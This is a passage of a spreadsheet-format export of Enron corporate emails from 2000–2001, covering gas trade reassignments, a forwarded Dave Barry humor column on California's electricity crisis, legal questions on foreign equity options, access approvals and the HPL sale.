Meter #  Scheduler_x000D_
_x000D_
68  Mary Poorman_x000D_
4132  Jackie Young_x000D_
1040  Aimee Lannou_x000D_
1606  Mary Poorman_x000D_
_x000D_
These schedulers should be advised of the changes._x000D_
_x000D_
Bob_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
Julie Meyers_x000D_
12/12/2000 01:49 PM_x000D_
To: Brant Reves/HOU/ECT@ECT_x000D_
cc: Robert Cotten/HOU/ECT@ECT, Kristen J Hanson/HOU/ECT@ECT _x000D_
Subject: Re: cannon assignment  _x000D_
_x000D_
_x000D_
New deal 529753._x000D_
_x000D_
Robert, please do your magic._x000D_
_x000D_
Kris, I'm not sure who in your group this should go to, this is a sale._x000D_
_x000D_
Julie_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Brant Reves_x000D_
12/11/2000 12:24 PM_x000D_
To: Julie Meyers/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: cannon assignment_x000D_
_x000D_
The trades below were originally executed between HPL and Cannon Interests _x000D_
Houston per terms of a specific Master Physical Agreement.  After recieving _x000D_
back executed documentation, we are ready to have the trades offically moved _x000D_
within the various Enron capuring systems from Cannon to Kinder Morgan Texas _x000D_
Pipeline, Inc. per the terms and conditions of the recently executed Master _x000D_
Physical Agreement between HPL and Kinder Morgan Texas Pipeline, Inc._x000D_
_x000D_
First, here are the TAG Nos. of the trades we wish to have assigned._x000D_
_x000D_
NU2813_x000D_
NA0376_x000D_
_x000D_
Second, several trades are listed within a ERMS book called:  P A M_x000D_
These trades show a 12-31-00 expiry and their Nos. are:_x000D_
_x000D_
522284_x000D_
830689_x000D_
892696_x000D_
904035_x000D_
904276_x000D_
_x000D_
I am not sure what these numbers are.  But, could you move them as well._x000D_
_x000D_
Thanks for your help._x000D_
_x000D_
brant_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Mar 2001 05:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jennifer.shipos@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">just a vicious rumor... my birthday's not till next year._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jennifer Shipos_x000D_
03/08/2001 12:22 PM_x000D_
To: john.arnold@enron.com_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
Tomorrow, eh!  How old are you going to be... 20?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Feb 2001 00:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'james.steffes@enron.com', 'maureen.mcvicker@enron.com', 'mark.palmer@enron.com', 'ginger.dernehl@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Dave Barry's thoughts on CA's electrical storage</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Richard Shapiro/NA/Enron on 02/07/2001 _x000D_
08:54 AM ---------------------------_x000D_
_x000D_
_x000D_
Ray Alvarez@TRANSREDES_x000D_
02/07/2001 07:42 AM_x000D_
To: Richard Shapiro@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Dave Barry's thoughts on CA's electrical storage_x000D_
_x000D_
Rick, thought you might enjoy this alternative theory on the root cause of _x000D_
Cal's problem.  Ray_x000D_
_x000D_
---------------------- Forwarded by Ray Alvarez/TRANSREDES on 02/07/2001 _x000D_
09:39 AM ---------------------------_x000D_
_x000D_
Steve Hopper_x000D_
02/07/2001 08:47 AM_x000D_
_x000D_
To: Ricky Lynn Waddell/SA/Enron@Enron, John Novak/SA/Enron@Enron, Laine A _x000D_
Powell/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Peter E Weidler/NA/Enron@Enron, _x000D_
Ray Alvarez/TRANSREDES@TRANSREDES, Doug Farmer/TRANSREDES@TRANSREDES_x000D_
cc:  _x000D_
_x000D_
Subject: Dave Barry's thoughts on CA's electrical storage_x000D_
_x000D_
_x000D_
Feb. 2, 2001, 8:06PM_x000D_
_x000D_
The rest of us should tell California to go fly a kite _x000D_
_x000D_
By DAVE BARRY  _x000D_
_x000D_
When we consider the serious electricity shortage in California, our  _x000D_
reaction, as concerned Americans, is: Ha ha!  _x000D_
_x000D_
No, seriously, we are alarmed. Because history teaches us that whatever  _x000D_
happens to California -- smog, road rage, tofu, coffee that is mainly air, _x000D_
cell  phones, the belief that abdominal muscles are attractive, Shirley _x000D_
MacLaine,  people taking in-line skating seriously, grandmothers sporting new _x000D_
and  flagrantly inappropriate bosoms -- eventually happens to the rest of the _x000D_
nation.  Thus it is vital that we analyze the California electricity shortage _x000D_
and see if  we can develop a workable solution before we become bored and _x000D_
change the  subject.  _x000D_
_x000D_
Our first question is: What, exactly, is electricity? When we look in our  _x000D_
Microsoft Encarta encyclopedia, we see that "electricity" is defined  as a _x000D_
"class of physical phenomena resulting from the existence of charge  and from _x000D_
the interaction of charges." What does this mean, in lay-person's  terms?  _x000D_
_x000D_
It means that whoever wrote the Microsoft Encarta encyclopedia is a big, fat  _x000D_
dope. Because we know from our junior-high-school science training that  _x000D_
electricity is actually a fast-moving herd of electrons, which are tiny  _x000D_
one-celled animals that can survive in almost any environment except inside _x000D_
a  double-A battery, where they die within minutes.  _x000D_
_x000D_
Electrons are formed when clouds rub together and become excited. This was  _x000D_
proved in the famous experiment wherein Benjamin Franklin flew a kite during _x000D_
a  thunderstorm and was almost killed. Encouraged by this success, Franklin _x000D_
went on  to conduct many more electrical experiments, including rolling a _x000D_
hoop in a  thunderstorm, playing hopscotch in a thunderstorm and doing _x000D_
somersaults in a  thunderstorm.  _x000D_
_x000D_
Finally one night he was caught wearing only a bonnet and playing Mister  _x000D_
Pooter Rides the Pony in a thunderstorm, leaving the authorities with no _x000D_
choice  but to arrest him and make him ambassador to France.  Nevertheless, _x000D_
Franklin had proved an important scientific point, which is  that electricity _x000D_
originates inside clouds. There it forms into lightning, which  is attracted _x000D_
to the earth by golfers.  _x000D_
_x000D_
After entering the ground, the electricity hardens into coal, which, when _x000D_
dug  up by power companies and burned in big ovens called "generators,"  _x000D_
turns back into electricity, which is sent in the form of "volts"  (also _x000D_
known as "watts," or "rpm" for short) through special  wires with birds _x000D_
sitting on them to consumers' homes, where it is transformed by  TV sets into _x000D_
commercials for beer, which passes through the consumers and back  into the _x000D_
ground, thus completing what is known as a "circuit."  _x000D_
_x000D_
But enough technical talk. The problem is that California is running out of  _x000D_
electricity. The situation is so bad that in some hospitals, they don't have  _x000D_
enough electricity to power those electric-shock paddles that get people's  _x000D_
hearts started again; instead, the doctors and nurses have to hold hands, _x000D_
scuff  their feet across the carpet in unison, then shout "CLEAR!" as they  _x000D_
touch the patient's chest.  _x000D_
_x000D_
Who is responsible for California's electricity shortage? You could blame _x000D_
the  power companies; or you could blame environmental wackos; or you could _x000D_
blame the  entertainment industry, which uses more than 750 billion watts of _x000D_
electricity  per day just to blow-dry the hair of the cast of Dawson's Creek; _x000D_
or you  could blame (why not?) the Firestone tire company. But you would be _x000D_
wrong.  Because obviously the real cause of the California electricity _x000D_
shortage is:  college students.  _x000D_
_x000D_
I base this statement on widespread observation of my son, who is a college  _x000D_
student, and who personally consumes more electricity than Belgium. If my son _x000D_
is  in a room, then every electrical device within 200 yards of that room -- _x000D_
every  light, computer, television, stereo, video game, microwave oven, etc. _x000D_
-- will be  running. My son doesn't even have to turn the devices on; they _x000D_
activate  themselves spontaneously in response to his presence.  _x000D_
_x000D_
Now take my son and multiply him by the number of college students in  _x000D_
California, which according to my research is (EDITOR: Please insert number _x000D_
of  college students in California) and you see my point, which is (EDITOR: _x000D_
Please  insert my point).  _x000D_
_x000D_
The question is: What can the rest of us do to help our fellow _x000D_
countrypersons  in California? The answer is that we can send them our spare _x000D_
electricity. Just  imagine what would happen if all the households in this _x000D_
great and generous  nation got out their extension cords and connected them _x000D_
together, forming a  giant electrical "chain of helping" across the fruited _x000D_
plain to the  Golden State! Millions of people would be turned into generous _x000D_
smoking lumps of  carbon, that's what. So maybe we should go with Plan B. _x000D_
This involves building a  really, really, really big kite.  _x000D_
_x000D_
Knight-Ridder Tribune  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 22 Dec 2001 06:58:28 -0800 (PST)</t>
  </si>
  <si>
    <t>Add/Drop notification</t>
  </si>
  <si>
    <t>| notifications                                                            |_x000D_
+--------------------------------------------------------------------------+_x000D_
_x000D_
_x000D_
Zereoue, Amos added to Money Shots's rosters, and Jackson, James dropped._x000D_
If you have a cell phone or pager, you can get this information even sooner! Go to your league's web site and click "Options, Notifications" on the main toolbar to have notifications sent to your pager or phone, via text messaging._x000D_
_x000D_
Win a VIP Vegas Vacation! OR Win $600 CASH!_x000D_
http://www.sportsline.com/links/6/1/223/sffn1106v.cgi_x000D_
+--------------------------------------------------------------------------+_x000D_
|        Copyright 2001 Commissioner.COM Inc and SportsLine.com Inc.       |_x000D_
|  Your site is always at http://football.fantasy.sportsline.com/spoogers  |_x000D_
+--------------------------------------------------------------------------+_x000D_
_x000D_
FB10SP</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 15:42:40 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'joan.quick@enron.com', 'marilyn.colbert@enron.com', 'susan.elledge@enron.com', 'ellen.wallumrod@enron.com', 'peggy.hedstrom@enron.com', 'david.hardy@enron.com', 'genia.fitzgerald@enron.com', 'l..nowlan@enron.com', 'lisa.lees@enron.com', 's..bryan@enron.com', 'geoff.storey@enron.com', 'susan.trevino@enron.com', 'claire.viejou@enron.com', 'matilda.machado@enron.com', 'lauri.allen@enron.com', 'r..guillen@enron.com', 'lisa.mcclendon@enron.com', 'stephanie.sever@enron.com', 'brant.reves@enron.com', 'p..dupre@enron.com', 'jim.homco@enron.com', 'laurel.adams@enron.com', 'h..lewis@enron.com', 's..theriot@enron.com', 'bridgette.anderson@enron.com', 'donna.lowry@enron.com', 'd..sorenson@enron.com', 'l..kelly@enron.com', 'sharon.gonzales@enron.com', 'a..price@enron.com', 'a..casas@enron.com', 'shonnie.daniel@enron.com', 'rita.wynne@enron.com', 'l..davis@enron.com', 'jim.little@enron.com', 'cheryl.dawes@enron.com', 'l..hernandez@enron.com', 'elsie.lew@enron.com', 'anthony.campos@enron.com', 'carolyn.gilley@enron.com', 'r..brackett@enron.com', 'joe.hunter@enron.com', 's..landry@enron.com', 'matthew.allan@enron.com', 'l..gay@enron.com', 'l..mims@enron.com', 'd..baughman@enron.com', 'm..schoppe@enron.com', 'cindy.horn@enron.com', 'd..winfree@enron.com', 'lesli.campbell@enron.com', 'jason.moore@enron.com', 'a..campos@enron.com', 'victor.lamadrid@enron.com', 'cyndie.balfour-flanagan@enron.com', 'camille.gerard@enron.com', 'john.sherriff@enron.com', 'debra.perlingiere@enron.com', 'amita.gosalia@enron.com', 'lara.mckinney@enron.com', 'mechelle.stevens@enron.com', 'tana.jones@enron.com', 'georgi.landau@enron.com', 'tracy.ngo@enron.com', 'marlene.hilliard@enron.com', 'karen.lambert@enron.com', 'scott.palmer@enron.com', 'stacey.richardson@enron.com', 'flavia.negrete@enron.com', 'leslie.reeves@enron.com', 'sony.wilson@enron.com', 'bob.bowen@enron.com'})</t>
  </si>
  <si>
    <t>October ATE report</t>
  </si>
  <si>
    <t>Attached is the Global Contracts report for all physical gas/financial assignments, terminations, and expirations for the month of October.  Please let me know if you have any questions._x000D_
_x000D_
 _x000D_
_x000D_
Thanks,_x000D_
SBR x30569</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 05:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>is that a good place to go for drinks afterwards or should i go somewhere _x000D_
else?</t>
  </si>
  <si>
    <t>Tue, 4 Jul 2000 03:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Korean Consents</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks.  I think the one dimension that I would like to see addressed a bit _x000D_
more explicitly is:  If the interest in the holding company itself is _x000D_
transferred, or the management control of the holding company changes hands, _x000D_
e.g., "Enron Corp." (old) is no longer chaired by Lay, who will chair "Enron _x000D_
Corp. (new)", but Enron Corp. (old) still is the JV interest owner, in _x000D_
addition to the legal requiriements, and consultation with locals you note _x000D_
below, is there any risk of "political" interference, such that they might _x000D_
extract concessions from the parties to the transaction before it could go _x000D_
forward.  Not necessarily fair, but they might have some leverage or perceive _x000D_
that they do.  If such a transaction goes forward, the dealmakers want to _x000D_
know this, so as to be able to fairly judge the risk, and how to allocate it _x000D_
in the deal.  thanks  mcs    _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mike Dahlke@ENRON_DEVELOPMENT_x000D_
04/07/2000 06:55_x000D_
To: Mark Schroeder@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Korean Consents_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
Per our conversation last week, please see attached._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 09:44:31 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: info</t>
  </si>
  <si>
    <t>_x000D_
This guy used to work for me,  He is really strong on finance and analytics and structuring.  _x000D_
 -----Original Message-----_x000D_
From: 	Hendon, Brian  _x000D_
Sent:	Wednesday, November 14, 2001 10:16 AM_x000D_
To:	Whitt, Mark_x000D_
Subject:	info_x000D_
_x000D_
Mark,_x000D_
_x000D_
As discussed. Let me know if anything comes up. Thanks._x000D_
_x000D_
 _x000D_
Brian Hendon_x000D_
Enron Global Markets_x000D_
Finance &amp; Structuring_x000D_
direct:  713-853-6301_x000D_
cell:     713-502-5021_x000D_
fax:      713-646-3203</t>
  </si>
  <si>
    <t>Wed, 30 May 2001 03:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'alan.aronowitz@enron.com', 'robert.bruce@enron.com', 'sara.shackleton@enron.com'})</t>
  </si>
  <si>
    <t>Foreign Listed Equity Options - GS update</t>
  </si>
  <si>
    <t xml:space="preserve">Sara, Alan and Robert,_x000D_
Who is the appropriate legal person to review this item?_x000D_
Thanks. Sheila_x000D_
_x000D_
---------------------- Forwarded by Sheila Glover/HOU/ECT on 05/30/2001 10:09 _x000D_
AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Sheila Glover                           05/24/2001 10:37 AM_x000D_
	_x000D_
_x000D_
To: John Greene/Enron@EUEnronXGate, David J Vitrella/Enron@EnronXGate, Selena _x000D_
Gonzalez/Enron@EnronXGate, Gary Hickerson/Enron@EnronXGate, John _x000D_
Weakly/Enron@EnronXGate, Mark Schlueter/Enron@EnronXGate_x000D_
cc: Aneela Charania/HOU/ECT@ECT, Theresa T Brogan/HOU/ECT@ECT, Sara _x000D_
Shackleton/HOU/ECT@ECT, Donna Lowry/Enron@EnronXGate, Lance _x000D_
Schuler-Legal/Enron@EnronXGate _x000D_
Subject: Foreign Listed Equity Options - GS update_x000D_
_x000D_
I spoke with Kara Saxon and Margo Topman, Goldman Sachs Legal, 212-902-9982._x000D_
Per our conversation ...._x000D_
_x000D_
Foreign Listed Equity Options are considered Unseasoned securities because _x000D_
they are issued on the date purchased and not widely held (from U.S. point of _x000D_
view).    GS has reviewed our ability to trade Foreign Listed Equity Options  _x000D_
vis-a-vis REG S.  Goldman says that we can execute from our London Office _x000D_
(not from States) Foreign Listed Equity Options.  We can settle and hold with _x000D_
our current account, documentation  and legal structure with Goldman Sachs.   _x000D_
_x000D_
Margo said that there is some risk but they do not think it is large.  She _x000D_
suggested we do a follow-up with our Securities counsel.  _x000D_
Sheila_x000D_
_x000D_
Sara, _x000D_
Can we run this by someone?  Margo offered herself as a contact if we need _x000D_
more infomation._x000D_
Thanks. Sheila_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Sheila Glover/HOU/ECT on 05/24/2001 09:25 _x000D_
AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Sheila Glover                           05/23/2001 02:00 PM_x000D_
	_x000D_
_x000D_
To: John Greene/Enron@EUEnronXGate, David J Vitrella/Enron@EnronXGate, Selena _x000D_
Gonzalez/Enron@EnronXGate, Gary Hickerson/Enron@EnronXGate_x000D_
cc: Aneela Charania/HOU/ECT@ECT, Theresa T Brogan/HOU/ECT@ECT, Sara _x000D_
Shackleton/HOU/ECT@ECT, Donna Lowry/Enron@EnronXGate, Lance _x000D_
Shuler/ENRON@enronxgate _x000D_
Subject: Foreign Listed Equity Options_x000D_
_x000D_
Goldman Sachs has given us the go-ahead to do Foreign Listed Equity Options.  _x000D_
Kara Saxon at Goldman called me today and will follow-up with an e-mail.  _x000D_
Goldman Sachs legal has said that we can trade as we currently do as ECT _x000D_
Investments, Inc.  This includes the whole European market.  I asked her to _x000D_
check on Canadian and Australian._x000D_
_x000D_
I will forward Kara's e-mail tomorrow._x000D_
Sheila_x000D_
---------------------- Forwarded by Sheila Glover/HOU/ECT on 05/23/2001 01:53 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Saxon, Kara" &lt;kara.saxon@gs.com&gt; on 05/23/2001 12:52:28 PM_x000D_
To: "'Sheila.Glover@enron.com'" &lt;Sheila.Glover@enron.com&gt;_x000D_
cc:  _x000D_
Subject: RE: FW: Enron North America_x000D_
_x000D_
Sheila-_x000D_
_x000D_
I promise I will send you that email tomorrow am.  I got tied up and I have_x000D_
to get going._x000D_
_x000D_
Kara_x000D_
_x000D_
-----Original Message-----_x000D_
From: Sheila.Glover@enron.com [mailto:Sheila.Glover@enron.com]_x000D_
Sent: Tuesday, May 22, 2001 9:47 AM_x000D_
To: kara.saxon@gs.com_x000D_
Cc: John.Greene@enron.com_x000D_
Subject: RE: FW: Enron North America_x000D_
_x000D_
_x000D_
_x000D_
Kara,_x000D_
Thanks for following up on this important ability for us.._x000D_
Sheila_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Saxon, Kara" &lt;kara.saxon@gs.com&gt; on 05/22/2001 08:32:02 AM_x000D_
_x000D_
To:   "'Sheila.Glover@enron.com'" &lt;Sheila.Glover@enron.com&gt;_x000D_
cc:_x000D_
Subject:  RE: FW: Enron North America_x000D_
_x000D_
Legal and compliance have made progress.  They have promised to get back to_x000D_
me by Wednesday or Thursday.  I will give you a call as soon as I get the_x000D_
good word._x000D_
_x000D_
Thanks,_x000D_
Kara_x000D_
_x000D_
-----Original Message-----_x000D_
From: Sheila.Glover@enron.com [mailto:Sheila.Glover@enron.com]_x000D_
Sent: Friday, May 18, 2001 10:00 AM_x000D_
To: kara.saxon@gs.com_x000D_
Subject: RE: FW: Enron North America_x000D_
_x000D_
_x000D_
_x000D_
Kara,_x000D_
Any progress on the European Listed Options?_x000D_
Thanks. Sheila_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Saxon, Kara" &lt;kara.saxon@gs.com&gt; on 05/14/2001 11:34:20 AM_x000D_
_x000D_
To:   "'Sheila.Glover@enron.com'" &lt;Sheila.Glover@enron.com&gt;_x000D_
cc:   Theresa.T.Brogan@enron.com_x000D_
Subject:  RE: FW: Enron North America_x000D_
_x000D_
Sheila-_x000D_
_x000D_
I just left you a voicemail.  My 2 follow up questions on the European_x000D_
listed options are:_x000D_
_x000D_
What is the title of the person in London who would be making the_x000D_
investment_x000D_
decisions doe Enron?_x000D_
_x000D_
Does Enron have any foreign subsidiaries?_x000D_
_x000D_
Thanks,_x000D_
Kara_x000D_
_x000D_
-----Original Message-----_x000D_
From: Sheila.Glover@enron.com [mailto:Sheila.Glover@enron.com]_x000D_
Sent: Wednesday, May 02, 2001 2:34 PM_x000D_
To: kara.saxon@gs.com_x000D_
Cc: Theresa.T.Brogan@enron.com_x000D_
Subject: Re: FW: Enron North America_x000D_
_x000D_
_x000D_
_x000D_
yes, European listed. sg_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Saxon, Kara" &lt;kara.saxon@gs.com&gt; on 05/02/2001 01:27:45 PM_x000D_
_x000D_
To:   "'Sheila Glover'" &lt;sheila_glover@enron.com&gt;_x000D_
cc:_x000D_
Subject:  FW: Enron North America_x000D_
_x000D_
_x000D_
Sheila-_x000D_
_x000D_
You are interested in trading European listed options and not OTC Euro_x000D_
options - correct?_x000D_
_x000D_
Thanks,_x000D_
Kara_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From:   Anthony, John P_x000D_
&gt; Sent:   Wednesday, May 02, 2001 1:10 PM_x000D_
&gt; To:     Saxon, Kara; Bradley, Oonagh; Veasey, Andrew T; Morris, Damian;_x000D_
&gt; Breckenridge, Jonathan E._x000D_
&gt; Cc:     Dunn, Jeremy; Threlfall, Tom; Arens, Joseph; Sibeud, Eugenie B;_x000D_
&gt; Brogard, Yves-Francois; Oreilly, Cathy; Hobson, Carol_x000D_
&gt; Subject:     RE: Enron North America_x000D_
&gt;_x000D_
&gt; not sure i have all the facts straight here but here are my thoughts-_x000D_
&gt; 1)  US funds with US investment mgr would not be permitted to have a_x000D_
&gt; direct relationship with GSI for European Listed Options._x000D_
&gt; 2)  They may be able to deal with GSI on an agency basis, but i would_x000D_
&gt; think the product would be an OTC Euro Option._x000D_
&gt;_x000D_
&gt; Is this any help?  i am cc Legal in London and NY in case they have a_x000D_
&gt; different view._x000D_
&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 01:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mae@cpuc.ca.gov'})</t>
  </si>
  <si>
    <t>frozenset({'sscott3@enron.com', 'andy.bettwy@swgas.com', 'tah@cpuc.ca.gov', 'rczahar@aol.com', 'garyb@abag.ca.gov', 'trdill@westernhubs.com', 'eklinkner@ci.pasadena.ca.us', 'napedersen@jonesday.com', 'porterdk@sce.com', 'thompson@wrightlaw.com', 'burkee@cts.com', 'salleyoo@dwt.com', 'jwr@cpuc.ca.gov', 'raw@cpuc.ca.gov', 'askaff@energy-law-group.com', 'jkarp@whitecase.com', 'johnwalley@swgas.com', 'slins@ci.glendale.ca.us', 'aod@newsdata.com', 'jsw@cpuc.ca.gov', 'ceyap@earthlink.net', 'jweil@aglet.org', 'bjeider@ci.burbank.ca.us', 'davef@abag.ca.gov', 'raveen_maan@cerberus.city.palo-alto.ca.us', 'gtbl@dynegy.com', 'mjaske@energy.state.ca.us', 'kfyip@seiworldwide.com', 'sbs@cpuc.ca.gov', 'jtachera@energy.state.ca.us', 'jsteffen@iid.com', 'jmct@gmssr.com', 'chrisw@greenlining.org', 'vjb@cpuc.ca.gov', 'kbhensman@aeraenergy.com', 'rick.counihan@greenmountain.com', 'rbw@mrwassoc.com', 'mark.c.moench@wgp.twc.com', 'evk1@pge.com', 'rochmanm@cubjpa.org', 'bcragg@gmssr.com', 'johnj@bcjlaw.com', 'furutanj@efawest.navfac.navy.mil', 'ron_oechsler@rmiinc.com', 'kmccrea@sablaw.com', 'plg@cpuc.ca.gov', 'alan_reid@pcp.ca', 'rmp@cpuc.ca.gov', 'mdjoseph@adamsbroadwell.com', 'joseh@lif.org', 'chilen@llgm.com', 'joe.paul@dynegy.com', 'lindseyhowdowning@dwt.com', 'bwood@energy.state.ca.us', 'lmh@eslawfirm.com', 'tomb@crossborderenergy.com', 'rgloistein@orrick.com', 'jcattermole@pcenergy.com', 'ram@cpuc.ca.gov', 'iep@iepa.com', 'mday@gmssr.com', 'edf@cpuc.ca.gov', 'eke@aelaw.com', 'chris.king@utility.com', 'roger.pelote@williams.com', 'ghinners@reliantenergy.com', 'haorndorff@aeraenergy.com', 'stomashe@energy.state.ca.us', 'mcn@cpuc.ca.gov', 'rfoss@coral-energy.com', 'marcel@turn.org', 'epoole@adplaw.com', 'tdickers@westerngas.com', 'inggm@sce.com', 'igsinc@ix.netcom.com', 'edwardoneill@dwt.com', 'chj@aelaw.com', 'pjpowerlaw@aol.com', 'tom.roth@et.pge.com', 'karen@klindh.com', 'dcarroll@dbsr.com', 'ronknecht@aol.com', 'craigc@calpine.com', 'ed@clfp.com', 'eyq@cpuc.ca.gov', 'mer@cpuc.ca.gov', 'grant_kolling@cerberus.city.palo-alto.ca.us', 'rpetti@ladwp.com', 'jleslie@luce.com', 'skatz@sempratrading.com', 'gsullivan@sempra.com', 'kmills@cfbf.com', 'ltt@cpuc.ca.gov'})</t>
  </si>
  <si>
    <t>Ora Comments on PD of Commissioner Bilas</t>
  </si>
  <si>
    <t xml:space="preserve"> - 1T%F01!.doc</t>
  </si>
  <si>
    <t>Tue, 7 Nov 2000 08:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Request Submitted: Access Request for mike.maggi@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">what is this approval for?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
ARSystem@mailman.enron.com on 11/07/2000 04:33:06 PM_x000D_
To: approval.eol.gas.traders@enron.com_x000D_
cc:  _x000D_
Subject: Request Submitted: Access Request for mike.maggi@enron.com_x000D_
_x000D_
_x000D_
You have received this email because you are listed as a security approver. _x000D_
Please click _x000D_
http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000006834&amp;Page=_x000D_
Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000006834_x000D_
Request Create Date : 11/7/00 4:33:47 PM_x000D_
Requested For       : mike.maggi@enron.com_x000D_
Resource Name       : ICE - External Intercontinental Exchange US Natural Gas_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 31 Oct 2000 09:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gerald.nemec@enron.com', 'amartin@enron.com'})</t>
  </si>
  <si>
    <t>Revisions to TBI Confidentiality Agreement</t>
  </si>
  <si>
    <t>Arvel / Gerald_x000D_
_x000D_
See the attached file.  These are the changes I had in mind if we use the_x000D_
TBI Confidentiality Agreement as the base document.  TBI indicated their_x000D_
desire to use this document.  Ready to discuss when you are._x000D_
_x000D_
Ken Krisa_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Revised CA Crescendo - TBI .doc</t>
  </si>
  <si>
    <t>Fri, 2 Mar 2001 05:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: HPL Closing</t>
  </si>
  <si>
    <t xml:space="preserve">fyi - Jade Eaton is one of Lara's contacts at DOJ_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 03/02/2001 01:12 PM -----_x000D_
_x000D_
	Lara Leibman@ENRON COMMUNICATIONS_x000D_
	02/28/2001 03:23 PM_x000D_
		_x000D_
		 To: Steven J Kean/NA/Enron@ENRON_x000D_
		 cc: Richard Shapiro/NA/Enron@ENRON_x000D_
		 Subject: Re: HPL Closing_x000D_
_x000D_
Steve,_x000D_
_x000D_
Thanks for forwarding.  Actually, Brian sent it to me on Monday, and I _x000D_
followed up with Ann and Barbara.  I have not spoken with Brian yet because I _x000D_
am waiting for a green/red light from Barbara as far as Jade Eaton is _x000D_
concerned.  Barbara and I spoke at length yesterday and she is concerned _x000D_
about the counterparty's reaction to a meeting with DOJ (even an informal _x000D_
one).  She plans to get back to me though with regard to whether they want me _x000D_
to get involved at this stage.  I spoke to Rick as well so he is up-to-date _x000D_
with the current status.  _x000D_
_x000D_
I'll let you know if anything further develops.  Thanks again._x000D_
_x000D_
Lara _x000D_
_x000D_
_x000D_
_x000D_
	Steven J Kean@ENRON_x000D_
	02/28/01 02:13 PM_x000D_
		 _x000D_
		 To: Lara Leibman/Enron Communications@Enron Communications_x000D_
		 cc: _x000D_
		 Subject: HPL Closing_x000D_
_x000D_
_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 02/28/2001 02:12 PM -----_x000D_
_x000D_
	Brian Redmond@ECT_x000D_
	02/26/2001 02:57 PM_x000D_
		 _x000D_
		 To: John J Lavorato/Enron@EnronXGate, Louise Kitchen/HOU/ECT@ECT, David W _x000D_
Delainey/HOU/EES@EES, Steven J Kean/NA/Enron@Enron, Sally Beck/HOU/ECT@ECT, _x000D_
Mark E Haedicke/HOU/ECT@ECT, David Oxley/Enron@EnronXGate, Wes _x000D_
Colwell/HOU/ECT@ECT, Tim DeSpain/HOU/ECT@ECT, Joseph _x000D_
Deffner/Enron@EnronXGate, Anne C Koehler/HOU/ECT@ECT, Barbara N _x000D_
Gray/HOU/ECT@ECT, Jim Coffey/HOU/ECT@ECT, Ann Ballard/enron@enronxgate, Jim _x000D_
Schwieger/HOU/ECT@ECT, Thomas A Martin/HOU/ECT@ECT, Richard _x000D_
Shapiro/NA/Enron@Enron, Joe Allen/NA/Enron@Enron, Tommy _x000D_
Yanowski/Enron@EnronXGate, Philippe A Bibi/Enron@EnronXGate, Patrick _x000D_
Wade/HOU/ECT@ECT, Tanya Rohauer/Enron@EnronXGate, Fran L _x000D_
Mayes/Enron@EnronXGate, Michelle Cash/HOU/ECT@ECT, Carolyn _x000D_
Gilley/HOU/ECT@ECT, Robert L Hall/ET&amp;S/Enron@Enron, Ranabir _x000D_
Dutt/Enron@EnronXGate, Tom Shelton/HOU/ECT@ECT, Steve HPL _x000D_
Schneider/HOU/ECT@ECT, Kenneth W Kaase/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: HPL Closing_x000D_
_x000D_
Please find the attached status update for the HPL transaction.  If you have _x000D_
any questions please contact me._x000D_
_x000D_
_x000D_
_x000D_
Thanks,_x000D_
Brian_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
